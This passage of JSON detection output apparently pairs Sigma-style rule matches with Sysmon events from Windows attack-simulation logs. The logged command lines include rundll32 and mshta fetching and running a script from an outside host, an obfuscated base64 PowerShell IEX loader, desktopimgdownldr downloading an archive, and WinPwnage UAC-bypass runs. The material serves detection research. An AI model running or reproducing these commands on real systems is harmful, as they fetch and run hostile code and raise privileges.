13:21:23.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429155,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:23.305903Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:33.196","Image":"C:\\windows\\system32\\mmc.exe","ProcessGuid":"00247C92-EC0A-600F-0000-00100AEFCC2C","ProcessId":22932,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\prebuildevent_visual_studio.evtx","UtcTime":"2021-01-26 13:21:33.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429156,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:33.197967Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"\"cmd.exe\" /s /k pushd \"C:\\Users\\IEUser\\Desktop\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4F8A-5CE3-0000-0010C5BB4800","ParentProcessId":3548,"ProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ProcessId":1532,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4125,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ParentProcessId":1532,"ProcessGuid":"365ABB72-1A29-5CE4-0000-00107BE42101","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4126,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-12 13:30:46.181","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ProcessId":1332,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\ieframe.url","UtcTime":"2019-05-12 13:30:46.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16387,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:30:46.181756Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" ieframe.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\ieframe.url","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"python winpwnage.py -u execute -i 9 -p c:\\Windows\\system32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ParentProcessId":1332,"ProcessGuid":"365ABB72-2006-5CD8-0000-0010A2862300","ProcessId":2960,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:30:46.213"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16388,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:30:46.400506Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-208A-5CD8-0000-0010119B2400","ProcessId":3560,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:32:58.167"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16390,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:32:58.167195Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20B1-5CD8-0000-001064D62400","ProcessId":1844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:33:37.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16391,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:33:37.078801Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20C7-5CD8-0000-001021022500","ProcessId":1416,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:33:59.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16392,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:33:59.743077Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-21B8-5CD8-0000-0010BADE2600","ProcessId":3856,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:38:00.523"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16395,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":1996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:38:00.523670Z"}},"Version":5}}}},{"detection":["Code Execution via Pcwutl.dll","Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" pcwutl.dll,LaunchApplication c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-516B-5CD8-0000-001087E41600","ParentProcessId":3788,"ProcessGuid":"365ABB72-532E-5CD8-0000-00106C222700","ProcessId":1528,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:09:02.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16507,"Execution":{"#attributes":{"ProcessID":2012,"ThreadID":300}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T17:09:02.275164Z"}},"Version":5}}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F639-5D53-0000-001092EE2600","ParentProcessId":6000,"ProcessGuid":"747F3D96-F639-5D53-0000-0010B0FC2600","ProcessId":8180,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 11:53:29.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10662,"Execution":{"#attributes":{"ProcessID":2004,"ThreadID":4480}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-14T11:53:30.022856Z"}},"Version":5}}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-EF3D-5EFE-0000-0010F3653401","ParentProcessId":5384,"ProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ProcessId":1932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 08:47:20.001"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305352,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T08:47:20.037922Z"}},"Version":5}}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"desktopimgdownldr.exe","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=BCDDCFFCA3754875261EF1427EC4F5F4BFB8C2CE,MD5=A6DAD18B0AA125535C7FB9BBFDA25266,SHA256=0A6A2690C68CF685D8FCC9F3EA78C35BBF6F296B7B33C956B39400DF749DBC78,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA","Image":"C:\\Windows\\System32\\desktopimgdownldr.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"desktopimgdownldr.exe","ParentCommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ParentProcessId":1932,"ProcessGuid":"747F3D96-F098-5EFE-0000-001090E33801","ProcessId":4604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 08:47:20.055"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305354,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T08:47:20.073262Z"}},"Version":5}}}},{"detection":["Suspicious Desktopimgdownldr Target File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-07-03 08:47:21.485","Image":"C:\\Windows\\System32\\svchost.exe","ProcessGuid":"747F3D96-2178-5EFE-0000-0010AADA5800","ProcessId":1556,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Personalization\\LockScreenImage\\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z","UtcTime":"2020-07-03 08:47:21.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":305356,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T08:47:21.491108Z"}},"Version":2}}}},{"detection":["Always Install Elevated MSI Spawned Cmd And Powershell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"\"C:\\Windows\\Installer\\MSI4FFD.tmp\"","ParentImage":"C:\\Windows\\Installer\\MSI4FFD.tmp","ParentProcessGuid":"365ABB72-D0E4-5CC8-0000-00103CB73E00","ParentProcessId":3680,"ProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ProcessId":2892,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 